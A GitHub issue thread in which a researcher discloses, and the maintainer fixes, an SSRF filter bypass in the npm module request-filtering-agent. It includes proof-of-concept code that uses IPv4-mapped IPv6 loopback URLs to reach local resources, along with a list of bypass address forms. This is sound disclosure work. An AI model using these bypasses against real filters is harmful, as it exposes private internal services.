
[BUG] SSRF protection bypass #2

Closed
Mik317 opened this issue Sep 5, 2019 · 10 comments · Fixed by #3
Labels
Type: Bug Bug or Bug fixes Type: Security Vulnerability disclosure or Fixing security issue

Comments

@Mik317

Mik317 commented Sep 5, 2019

Hi Team :),
I'm a security researcher from HackerOne and I've discovered a good way to bypass the SSRF protection using IPv6-formatted URLs ... which aren't correctly checked, allowing me to bypass the protection provided by the module and, at the same time, access the content of private and local resources ;)

I've already reported the issue on the official NPM program https://hackerone.com/nodejs-ecosystem, but the team said it's a "missing functionality and not a bug" ... so I'd like to know how I can report the issue (do I add the report directly here?), and whether you're OK with considering this a valid issue, in order to let me earn reputation / be awarded (probably) a CVE :).

Best, Mik

@Mik317 Mik317 changed the title SSRF filter bypass bug [BUG] SSRF protection bypass Sep 5, 2019
@azu azu added the Type: Bug Bug or Bug fixes label Sep 5, 2019
@Mik317
Author

Mik317 commented Sep 5, 2019

Hi @azu :).
So can I attach my full report here, or do you prefer I send it privately to you/another team member?

Thank you,
Mik

@azu
Owner

azu commented Sep 5, 2019

@Mik317 Thanks for the report!

Probably, no one uses this module yet.
So I'm OK with attaching the security bug to this issue.
If you have a patch, please submit a Pull Request!

If you want to do it privately, please follow this doc https://github.com/azu/request-filtering-agent/blob/master/SECURITY.md (I created this document just now :))

@azu azu added the Type: Security Vulnerability disclosure or Fixing security issue label Sep 5, 2019
@Mik317
Author

Mik317 commented Sep 5, 2019

OK, I'm going to share part of the report I've already submitted on the H1 platform :)

Vulnerability:
SSRF protection bypass due to unchecked IPv6 formatted URLs allowed by the module

Vulnerability Description:
The issue is really simple: it's an SSRF.
The worst thing is that the module should protect from this attack, but it's simply bypassable, leading to various impacts: private data disclosure, port scanning and XSPA attacks, and finally pivoting inside a private network.

Steps To Reproduce:

  1. Download the module using the following command: npm i request-filtering-agent
  2. Create a PoC file named poc.js with the following code:
const fetch = require("node-fetch");
const { useAgent } = require("request-filtering-agent");
// IPv4-mapped IPv6 literal for loopback: the agent's deny list does not match it
const url = 'http://[0:0:0:0:0:ffff:127.0.0.1]/';
fetch(url, {
    agent: useAgent(url)
}).catch(err => {
    console.log(err);
});
  3. Start a simple local server: you can use nc or a simple Python server (in this case, run the following command in bash: python3 -m http.server 80)
  4. Run node poc.js in the terminal
  5. You'll receive a request on the local server you started (SSRF protection is bypassed :))
    (screenshot)

Patch:

Check not only for DNS redirection (very well implemented) and IPv4 addresses, but also IPv6 URLs :)

Additional note:
I've shown only the request received by the Python local server (you can see the logs of the Python server), but because the fetcher also lets us obtain the body of the requested resource, it's possible to obtain the complete response body :)

//poc.js
const fetch = require("node-fetch");
const { useAgent } = require("request-filtering-agent");
// Same IPv4-mapped loopback literal, this time reading the response body back
const url = 'http://[0:0:0:0:0:ffff:127.0.0.1]/secret';
fetch(url, {
    agent: useAgent(url)
}).then(res => res.text()).then(body => console.log(body));

(screenshot)

Best, Mik

@Mik317
Author

Mik317 commented Sep 5, 2019

Regarding the pull request, I'm not a good Node.js developer; however, I can try to implement something in order to block IPv6 URLs too :)

Regarding my second question: would you consider this an issue or a missing functionality?

Best, Mik

@Mik317
Author

Mik317 commented Sep 5, 2019

OK, I took a look at your code, and it seems you enable filters against IPv6 URLs like [::] (https://github.com/azu/request-filtering-agent/blob/master/src/request-filtering-agent.ts#L20), but the specially crafted URL I've used isn't blocked. This should mean I'm eligible for a CVE and a report on the H1 platform (I asked them; they're going to analyze the status :)).
(screenshot)

Also, the check done for IPv6 is limited to this: https://github.com/azu/request-filtering-agent/blob/master/src/request-filtering-agent.ts#L48

Regarding the fix, I'm working on something that is more a blacklist than a real, well-implemented solution (mainly because I don't have much time to do things correctly ...). So, I suggest adding the following addresses to the denyIPAddressList (I know blacklisting isn't the perfect fix, but right now I'm not able to think of something better to avoid the issue temporarily :)):

  • [0:0:0:0:0:ffff:127.0.0.1]
  • [::ffff:127.0.0.1]
  • [::ffff:7f00:1]

I'll let you know if there are other possible bypasses as well :)

Best, Mik

@azu
Owner

azu commented Sep 5, 2019

Thanks for the details.

Currently, this module uses node-ip.
That module defines an isPrivate method, but something is missing.
(IPv4-mapped IPv6 addresses are not defined)

I will use another IP address parser like ipaddr.js.

@Mik317
Author

Mik317 commented Sep 5, 2019

Hmm, should I also report the issue in mapping them in their repository?
If yes, can I present your case as a demonstration in an impact analysis?

Best, Mik

@azu
Owner

azu commented Sep 5, 2019

Hmm, should I also report the issue in mapping them in their repository?

I found a similar issue.
indutny/node-ip#50

If yes, can I present your case as a demonstration in an impact analysis?

What does it mean?

@azu azu closed this as completed in #3 Sep 5, 2019
@azu
Owner

azu commented Sep 5, 2019

I've tried to fix it in #3 and published https://github.com/azu/request-filtering-agent/releases/tag/1.0.4

I'll investigate IPv6 address testing in #4

Thanks again @Mik317

@azu
Owner

azu commented Sep 5, 2019

Sorry. I overlooked your question. #2 (comment)

Regarding my second question: would you consider this an issue or a missing functionality?

It is a difficult question.
Both.
I think that this is an issue, but this library was missing IPv6 support.
